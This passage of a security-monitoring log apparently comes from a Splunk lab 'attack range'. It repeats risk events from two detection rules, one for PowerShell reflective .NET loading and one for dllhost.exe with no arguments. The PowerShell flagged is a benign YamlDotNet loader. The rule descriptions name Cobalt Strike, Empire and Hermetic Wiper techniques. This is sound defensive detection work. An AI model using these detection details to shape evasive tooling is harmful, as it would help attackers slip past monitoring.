\"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T21:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T21:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664751332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T21:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T21:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664744400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664744400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2976", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664744400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664744400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xba0", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664747732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T20:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T20:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664747732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T20:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T20:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664747732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T20:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T20:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664747732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T20:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T20:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664740800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664740800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", 